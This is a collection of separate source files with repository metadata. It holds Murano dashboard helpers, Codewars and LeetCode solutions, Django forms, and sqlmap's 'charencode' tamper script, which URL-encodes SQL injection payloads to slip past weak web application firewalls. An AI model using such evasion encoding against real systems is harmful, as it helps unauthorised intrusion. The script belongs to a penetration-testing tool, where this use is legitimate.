        # works on both Python 2.6+ and Python 3.
        return next(apps)
    except StopIteration:
        return None
def make_loader_cls():
    """Build a yaml.Loader subclass that parses !yaql tags (explicit and
    implicitly matched scalars) into YaqlExpression objects.
    """
    class Loader(yaml.Loader):
        pass
    def yaql_constructor(loader, node):
        # Turn the scalar node's text into a YaqlExpression instance.
        value = loader.construct_scalar(node)
        return yaql_expression.YaqlExpression(value)
    # workaround for PyYAML bug: http://pyyaml.org/ticket/221
    # (copy the resolver table so registering the implicit resolver below
    # does not mutate the table shared by the base yaml.Loader)
    resolvers = {}
    for k, v in yaml.Loader.yaml_implicit_resolvers.items():
        resolvers[k] = v[:]
    Loader.yaml_implicit_resolvers = resolvers
    Loader.add_constructor(u'!yaql', yaql_constructor)
    Loader.add_implicit_resolver(
        u'!yaql', yaql_expression.YaqlExpression, None)
    return Loader
# Some api data calls are cached below; note that not every package attribute
# getter should be cached - only immutable ones can safely be. E.g., it would
# be a mistake to cache the Application Name, because it is mutable and can be
# changed in Manage -> Packages, while the cache is immutable (i.e. its
# contents are obtained from the api only the first time).
@cache.with_cache('ui', 'ui.yaml')
def get_app_ui(request, app_id):
    """Fetch (and cache) the package's dynamic UI definition, yaql-aware."""
    return api.muranoclient(request).packages.get_ui(app_id, make_loader_cls())
@cache.with_cache('logo', 'logo.png')
def get_app_logo(request, app_id):
    """Fetch (and cache) the package's logo image."""
    return api.muranoclient(request).packages.get_logo(app_id)
@cache.with_cache('supplier_logo', 'supplier_logo.png')
def get_app_supplier_logo(request, app_id):
    """Fetch (and cache) the supplier's logo image for the package."""
    return api.muranoclient(request).packages.get_supplier_logo(app_id)
@cache.with_cache('package_fqn')
def get_app_fqn(request, app_id):
    """Fetch (and cache) the package's fully qualified name (immutable)."""
    package = api.muranoclient(request).packages.get(app_id)
    return package.fully_qualified_name
@cache.with_cache('package_name')
def get_service_name(request, app_id):
    """Fetch (and cache) the package's name.

    NOTE(review): package names are editable in Manage -> Packages, so per
    the note above this cache can go stale — confirm this is acceptable.
    """
    package = api.muranoclient(request).packages.get(app_id)
    return package.name
|
[
"[email protected]"
] | |
0f702ff15d1d5b9145082f6402c50e7a282d49a8
|
5b3d8b5c612c802fd846de63f86b57652d33f672
|
/Python/eight_kyu/make_negative.py
|
1ced2d2e37e6381d69e9df3fff51514a55f71b75
|
[
"Apache-2.0"
] |
permissive
|
Brokenshire/codewars-projects
|
1e591b57ed910a567f6c0423beb194fa7f8f693e
|
db9cd09618b8a7085b0d53ad76f73f9e249b9396
|
refs/heads/master
| 2021-07-22T18:50:25.847592 | 2021-01-25T23:27:17 | 2021-01-25T23:27:17 | 228,114,677 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 724 |
py
|
# Python solution for 'Return Negative' codewars question.
# Level: 8 kyu
# Tags: FUNDAMENTALS and NUMBERS.
# Author: Jack Brokenshire
# Date: 11/04/2020
import unittest
def make_negative(number):
    """Return *number* made non-positive.

    :param number: an integer value.
    :return: the negated value for positive input; negative numbers and
        zero are returned unchanged.
    """
    if number > 0:
        return -number
    return number
class TestMakeNegative(unittest.TestCase):
    """Class to test make_negative function"""
    def test_make_negative(self):
        # Positive inputs flip sign; negative and zero stay unchanged.
        self.assertEqual(make_negative(42), -42)
        self.assertEqual(make_negative(1), -1)
        self.assertEqual(make_negative(-5), -5)
        self.assertEqual(make_negative(0), 0)
if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
be5c1b5992e68428d06e14747e5ee74245b52472
|
58afefdde86346760bea40690b1675c6639c8b84
|
/leetcode/elimination-game/365996335.py
|
a8932065ba6959fe4df1131bf0761ece4fd6de2d
|
[] |
no_license
|
ausaki/data_structures_and_algorithms
|
aaa563f713cbab3c34a9465039d52b853f95548e
|
4f5f5124534bd4423356a5f5572b8a39b7828d80
|
refs/heads/master
| 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 311 |
py
|
# title: elimination-game
# detail: https://leetcode.com/submissions/detail/365996335/
# datetime: Mon Jul 13 18:50:53 2020
# runtime: 52 ms
# memory: 13.7 MB
class Solution:
    def lastRemaining(self, n: int) -> int:
        """LeetCode 390: alternate left-to-right / right-to-left elimination
        over 1..n, removing every other number; return the survivor.

        Iterative form of the usual recurrence: track the first surviving
        number ('head') and the gap between survivors ('step').
        """
        head, step = 1, 1
        sweep_left_to_right = True
        remaining = n
        while remaining > 1:
            # The head advances on every left sweep, and on a right sweep
            # only when an odd count of survivors makes the head fall.
            if sweep_left_to_right or remaining % 2 == 1:
                head += step
            remaining //= 2
            step *= 2
            sweep_left_to_right = not sweep_left_to_right
        return head
|
[
"[email protected]"
] | |
1dc16a63a83e65662628b2453ff91ff337eff28d
|
3de21fc587c02f2702bd5770f11a31d5558a4666
|
/django_ac22/apps/avisos/forms.py
|
f0f90b51cfdad481b5d8887b01638b45daf0f108
|
[] |
no_license
|
juanros13/ac22
|
8c20d59de62d596a73d6d7190f551ef3accf2b8e
|
d8ecf0686f3d8a57a747503b231b46277db71a6e
|
refs/heads/master
| 2020-04-16T11:24:07.344404 | 2016-09-22T23:51:39 | 2016-09-22T23:51:39 | 65,859,654 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
# -*- encoding: utf-8 -*-
from django import forms
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import authenticate
from django.forms.widgets import Select, Textarea
from apps.avisos.models import Aviso, ComentarioAviso
class AvisoAddForm(forms.ModelForm):
    """Form for creating/editing an Aviso (announcement).

    User-facing labels/placeholders are intentionally Spanish — do not
    translate them; they are rendered to end users.
    """
    titulo = forms.CharField(
        widget=forms.TextInput(
            attrs={
                'class': 'form-control',
                'placeholder' : 'Ingresa el titulo del aviso',
            }
        ),
        label = "Titulo del aviso",
    )
    class Meta:
        model = Aviso
        fields = ('tipo','titulo', 'contenido','mantener_al_principio')
        widgets = {
            'contenido': Textarea(
                attrs={
                    'class': 'form-control',
                }
            ),
        }
class ComentarioAddForm(forms.ModelForm):
    """Form for posting a comment (ComentarioAviso) on an announcement."""
    class Meta:
        model = ComentarioAviso
        fields = ('comentario',)
        widgets = {
            'comentario': Textarea(
                attrs={
                    'class': 'form-control',
                }
            ),
        }
|
[
"[email protected]"
] | |
7efb8ef9da9d77a2dea29542cdfeae246c6ad6d6
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/Cookbook/Array/最小路径和.py
|
8fcbf61420a03b424278ab65480d35b31e907523
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,076 |
py
|
'''
给定一个包含非负整数的 m x n 网格 grid ,请找出一条从左上角到右下角的路径,使得路径上的数字总和为最小。
说明:每次只能向下或者向右移动一步。
示例 1:
输入:grid = [[1,3,1],[1,5,1],[4,2,1]]
输出:7
解释:因为路径 1→3→1→1→1 的总和最小。
示例 2:
输入:grid = [[1,2,3],[4,5,6]]
输出:12
提示:
m == grid.length
n == grid[i].length
1 <= m, n <= 200
0 <= grid[i][j] <= 100
'''
from typing import List
class Solution:
    def minPathSum(self, grid: List[List[int]]) -> int:
        """Minimum sum of a top-left → bottom-right path (moves: right/down).

        Note: the DP runs in place, so *grid* is overwritten with running
        path sums — same observable behaviour as the original.
        """
        rows, cols = len(grid), len(grid[0])
        for r in range(rows):
            for c in range(cols):
                if r == 0 and c == 0:
                    continue  # start cell keeps its own cost
                if r == 0:
                    grid[r][c] += grid[r][c - 1]      # first row: only from left
                elif c == 0:
                    grid[r][c] += grid[r - 1][c]      # first column: only from above
                else:
                    grid[r][c] += min(grid[r - 1][c], grid[r][c - 1])
        return grid[-1][-1]
if __name__ == '__main__':
    # Sample 1 from the problem statement: expected minimum path sum is 7.
    grid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]
    sol = Solution()
    print(sol.minPathSum(grid))
|
[
"[email protected]"
] | |
6ccaf0b7923ddbcf05dbd74de253ca863a8a52de
|
57db61160494659af43ee255d1e6ab2af6617114
|
/ultron-api/contact/admin.py
|
92b8324a11994ac12b4367be09b970e401577cbe
|
[] |
no_license
|
gloompi/ultron-studio
|
fc667d563467b386a8dec04a6079e7cdcfedc5a7
|
ec2ae8051644df2433b931c7e0228e75eaf20990
|
refs/heads/master
| 2023-06-25T19:22:45.119315 | 2019-12-08T05:53:02 | 2019-12-08T05:53:02 | 226,545,035 | 0 | 0 | null | 2023-06-10T00:22:15 | 2019-12-07T16:44:16 |
JavaScript
|
UTF-8
|
Python
| false | false | 205 |
py
|
from django.contrib import admin
from .models import Contact
class ContactAdmin(admin.ModelAdmin):
    # Columns shown in the admin changelist for Contact.
    list_display = ('id', 'title')
# Register your models here.
admin.site.register(Contact, ContactAdmin)
|
[
"[email protected]"
] | |
aca820fb2f94f242539ff4b7b1b2ab02fbc5a555
|
148072ce210ca4754ea4a37d83057e2cf2fdc5a1
|
/src/core/w3af/w3af/plugins/attack/db/sqlmap/tamper/charencode.py
|
6d1a46727fed80594ad45d9e5cbf3e7aa2e118f8
|
[] |
no_license
|
ycc1746582381/webfuzzer
|
8d42fceb55c8682d6c18416b8e7b23f5e430c45f
|
0d9aa35c3218dc58f81c429cae0196e4c8b7d51b
|
refs/heads/master
| 2021-06-14T18:46:59.470232 | 2017-03-14T08:49:27 | 2017-03-14T08:49:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,491 |
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import string
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
    """Standard tamper-script hook; this script needs no extra setup."""
    pass
def tamper(payload, **kwargs):
    """
    Url-encodes all characters in a given payload (not processing already
    encoded)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak web application firewalls that do not
          url-decode the request before processing it through their ruleset
        * The web server will anyway pass the url-decoded version behind,
          hence it should work against any DBMS

    >>> tamper('SELECT FIELD FROM%20TABLE')
    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
    """
    if not payload:
        return payload
    pieces = []
    position, total = 0, len(payload)
    while position < total:
        # A '%' followed by two hex digits is an already-encoded byte:
        # copy the triple through untouched instead of double-encoding it.
        if (payload[position] == '%' and position < total - 2 and
                payload[position + 1:position + 2] in string.hexdigits and
                payload[position + 2:position + 3] in string.hexdigits):
            pieces.append(payload[position:position + 3])
            position += 3
        else:
            pieces.append('%%%.2X' % ord(payload[position]))
            position += 1
    return "".join(pieces)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.